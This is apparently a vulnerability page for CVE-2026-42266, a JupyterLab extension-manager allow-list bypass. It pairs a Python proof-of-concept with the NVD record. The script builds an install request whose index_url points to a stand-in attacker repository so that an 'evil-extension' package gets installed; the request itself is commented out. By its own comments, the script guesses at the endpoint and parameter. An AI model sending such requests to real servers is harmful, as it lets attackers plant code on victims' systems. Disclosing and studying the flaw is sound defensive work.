CVE-2026-42266

# PoC for CVE-2026-42266: JupyterLab Extension Manager Allow-list Bypass # This script demonstrates how an attacker might exploit the bypass to install a package from a malicious source. import requests import sys def exploit(target_host, malicious_pkg_name, malicious_index_url): """ Simulates the installation request bypassing the allow-list. Note: Actual API endpoints may vary based on JupyterLab configuration. """ # Theoretical API endpoint for installing extensions install_url = f"{target_host}/api/extensions/install" # Headers with a low-privilege token (simulating PR:L) headers = { "Authorization": "token <low_privilege_token>", "Content-Type": "application/json" } # Payload attempting to install from a non-whitelisted source # The vulnerability allows the 'index_url' or similar parameter to bypass the 'allowed_extensions_uris' check payload = { "name": malicious_pkg_name, "source": "pypi", "index_url": malicious_index_url # Bypassed validation allows arbitrary URLs here } print(f"[*] Attempting to install '{malicious_pkg_name}' from '{malicious_index_url}'...") try: # response = requests.post(install_url, json=payload, headers=headers, verify=False) # if response.status_code == 200: # print("[+] Exploit successful! Malicious package installed.") # else: # print(f"[-] Failed with status code: {response.status_code}") print(f"[+] Request payload constructed: {payload}") print("[+] If vulnerable, the package would be installed from the malicious source.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Example usage TARGET = "http://vulnerable-jupyterlab:8888" PKG_NAME = "evil-extension" EVIL_INDEX = "http://attacker-controlled-malicious-repo.com/simple" exploit(TARGET, PKG_NAME, EVIL_INDEX)

{"cve": {"id": "CVE-2026-42266", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:47.017", "lastModified": "2026-05-13T16:32:31.457", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "jupyterlab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook Architecture. From 4.0.0 to 4.5.6, the allow-list of extensions that can be installed from PyPI Extension Manager (allowed_extensions_uris) is not correctly enforced by JupyterLab. The PyPI Extension Manager was not contained to packages listed on the default PyPI index. This vulnerability is fixed in 4.5.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-88"}, {"lang": "en", "value": "CWE-602"}]}], "references": [{"url": "https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-37w4-hwhx-4rc4", "source": "[email protected]"}]}}